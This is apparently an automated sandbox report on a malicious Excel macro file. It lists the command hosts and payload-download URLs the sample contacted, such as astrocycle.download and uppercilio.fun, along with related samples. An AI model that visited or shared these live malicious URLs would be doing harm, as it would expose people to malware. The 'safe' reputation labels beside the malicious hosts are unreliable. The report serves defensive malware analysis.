http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.buzzsprout.com;	0%	Avira URL Cloud	safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1WYTN19H6M239HCDYQASBX-Content-Ty	0%	Avira URL Cloud	safe
http://astrocycle.download/	0%	Avira URL Cloud	safe
http://crt.rootg2.amazontrust.com/root.	0%	Avira URL Cloud	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://uppercilio.fun/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	0%	Avira URL Cloud	safe
http://thousandsyears.download/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
https://amazonwebservices.d2.sc.omtrdc.net	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://112-tzm-766.mktoutil.com	0%	Avira URL Cloud	safe
https://download.stormacq.com/aws/podcast/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
astrocycle.download	0%	Avira URL Cloud	safe
https://chtbl.com	0%	Avira URL Cloud	safe
https://amazonwebservicesinc.tt.omtrdc.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
uppercilio.fun	104.21.55.83	true	false	unknown
thousandsyears.download	172.67.198.51	true	false	unknown
voopeople.fun	172.67.194.117	true	false	unknown
astrocycle.download	172.67.213.115	true	true	unknown
dr49lng3n1n2s.cloudfront.net	143.204.91.74	true	false	high
aws.amazon.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://astrocycle.download/	true	Avira URL Cloud: safe	unknown
http://uppercilio.fun/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown
http://thousandsyears.download/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown
astrocycle.download	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.linkedin.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/directories	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://c0.b0.p.awsstatic.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.regional-table.region-services.aws.a2z.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/librastandardlib	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://a0.p.awsstatic.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/cn/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://www.buzzsprout.com;	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://i18n-string.us-west-2.prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1WYTN19H6M239HCDYQASBX-Content-Ty	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.aws.amazon.com/index.html?nc2=h_ql_doc	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://p.adsymptotic.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://docs.aws.amazon.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://www.windows.com/pctv.	regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	false		high
http://crt.rootg2.amazontrust.com/root.	regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/marketplace/?nc2=h_mo	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://d2a6igt6jhaluh.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://ocsp.sca1b.amazontrust.com06	regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://console.aws.amazon.com/support/home/?nc2=h_ql_cu	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://dftu77xade0tc.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/search/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/?nc2=h_lg	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://console.aws.amazon.com/support/home/?nc1=f_dr	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://crl.rootg2.amazontrust.com/rootg2.crl0	regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/tw/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/tr/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/fr/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://d1fgizr415o1r6.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-search/1.0.13/js	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://f0.awsstatic.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	false		high
https://spot-bid-advisor.s3.amazonaws.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://d3ctxlq1ktw2nl.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://amazonwebservices.d2.sc.omtrdc.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/podcasts/aws-podcast/	regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	false		high
https://d1yyh5dhdgifnx.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/jp/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://d1hemuljm71t2j.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/css/1.0.382	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://view-stage.us-west-2.prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://s3.amazonaws.com/public-pricing-agc/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/de/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	false		high
https://phd.aws.amazon.com/?nc2=h_m_sc	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/libra-cardsui	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	regsvr32.exe, 00000004.00000002.2088126688.0000000002DF0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://ssl-static.libsyn.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://website.spot.ec2.aws.a2z.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://112-tzm-766.mktoutil.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://static.doubleclick.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/?nc1=f_ls	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://investor.msn.com	regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	false		high
https://aws.amazon.com/tr/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/g11n-lib/2.0.76	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://s0.awsstatic.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://www.amazon.jobs/aws	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://googleads.g.doubleclick.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://s3.amazonaws.com/aws-messaging-pricing-information/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://download.stormacq.com/aws/podcast/	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/support/home?nc2=h_ql_cu	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://d2908q01vomqb2.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dgen8gghn3u86.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/?nc1=f_ls	regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/aws-blog/1.0.47/js	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://chtbl.com	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dk261l6wntthl.cloudfront.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/billing/home?nc2=h_m_bc	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high
https://amazonwebservicesinc.tt.omtrdc.net	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://twitter.com/awscloud	regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.198.51	thousandsyears.download	United States	13335	CLOUDFLARENETUS	false
143.204.91.74	dr49lng3n1n2s.cloudfront.net	United States	16509	AMAZON-02US	false
104.21.55.83	uppercilio.fun	United States	13335	CLOUDFLARENETUS	false
172.67.213.115	astrocycle.download	United States	13335	CLOUDFLARENETUS	true
172.67.194.117	voopeople.fun	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	444736
Start date:	06.07.2021
Start time:	16:10:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	uhr908723097306.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 65.4% (good quality ratio 51.5%) Quality average: 59.5% Quality standard deviation: 39.6%
HCA Information:	Successful, ratio: 77% Number of executed functions: 12 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.198.51	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	List-4527768.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	PI-210610.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
143.204.91.74	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse
	8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dll	Get hash	malicious	Browse
	718421.xlsm	Get hash	malicious	Browse
	paxi1.dll	Get hash	malicious	Browse
	7hu4M2hAe7.dll	Get hash	malicious	Browse
	lQsa52UcOF.xlsb	Get hash	malicious	Browse
	b8c033482291a3c073483fc23df165d39fd79c6f22144.dll	Get hash	malicious	Browse
	jLyCpYVr6p.dll	Get hash	malicious	Browse
	E7D5105D3408A45C1003172B9A1AA3A1E60F7AC6E07E8.dll	Get hash	malicious	Browse
	BA6D707A66005C28EA843C2F7623AF7B7B09B1C02FCF0.dll	Get hash	malicious	Browse
	3AC49BC78F8FCB40EEA7016B3319401AF6CF19149586E.dll	Get hash	malicious	Browse
104.21.55.83	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	PI-210610.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
astrocycle.download	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.213.115
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	104.21.37.209
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.213.115
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.213.115
	Formtofill4184860.xlsm	Get hash	malicious	Browse	104.21.37.209
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	172.67.213.115
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	104.21.37.209
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.213.115
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.213.115
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.213.115
voopeople.fun	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.194.117
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.194.117
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
thousandsyears.download	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.198.51
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.198.51
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.198.51
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.198.51
	Formtofill4184860.xlsm	Get hash	malicious	Browse	104.21.52.111
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	172.67.198.51
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.198.51
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.198.51
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.198.51
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.198.51
dr49lng3n1n2s.cloudfront.net	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	143.204.91.74
	List-4527768.xlsm	Get hash	malicious	Browse	13.225.75.73
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.225.75.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.225.75.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.224.92.73
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.224.92.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.224.92.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.4.74
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse	143.204.91.74
	8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dll	Get hash	malicious	Browse	143.204.91.74
	718421.xlsm	Get hash	malicious	Browse	143.204.91.74
	Ln11IgJVUM.dll	Get hash	malicious	Browse	13.225.75.73
	6c710694d270db91b550daf3177622514d2444e7484fb.dll	Get hash	malicious	Browse	13.225.75.73
	SOAOG31JdG.dll	Get hash	malicious	Browse	13.225.75.73
	QEiuTX6cTw.dll	Get hash	malicious	Browse	143.204.91.74
	YiIS9HvO21.dll	Get hash	malicious	Browse	13.32.16.68
	xDxD5fLpPC.dll	Get hash	malicious	Browse	52.222.157.68
	YiIS9HvO21.dll	Get hash	malicious	Browse	52.222.157.68
uppercilio.fun	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	104.21.55.83
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.146.88
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.146.88
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	104.21.55.83
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.146.88
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.55.83
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	104.21.55.83
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	104.21.55.83
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	104.21.55.83
	PI-210610.xlsm	Get hash	malicious	Browse	104.21.55.83

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.194.117
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.194.117
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	runsys32.dll	Get hash	malicious	Browse	104.20.185.68
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	SMR8OzIgNB.exe	Get hash	malicious	Browse	104.21.8.151
	Follow up Purchase order num- 4500262450.exe	Get hash	malicious	Browse	104.21.75.42
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
	2790000.dll	Get hash	malicious	Browse	104.20.185.68
	2770174.dll	Get hash	malicious	Browse	104.20.185.68
	Payment Invoice.exe	Get hash	malicious	Browse	172.67.188.154
	rial exe.exe	Get hash	malicious	Browse	104.21.19.200
	Quotation.exe	Get hash	malicious	Browse	104.21.19.200
	SCTc9qaix4.exe	Get hash	malicious	Browse	1.0.0.1
	AFS Co., Ltd..exe	Get hash	malicious	Browse	104.26.6.41
CLOUDFLARENETUS	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.194.117
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.194.117
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	runsys32.dll	Get hash	malicious	Browse	104.20.185.68
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	SMR8OzIgNB.exe	Get hash	malicious	Browse	104.21.8.151
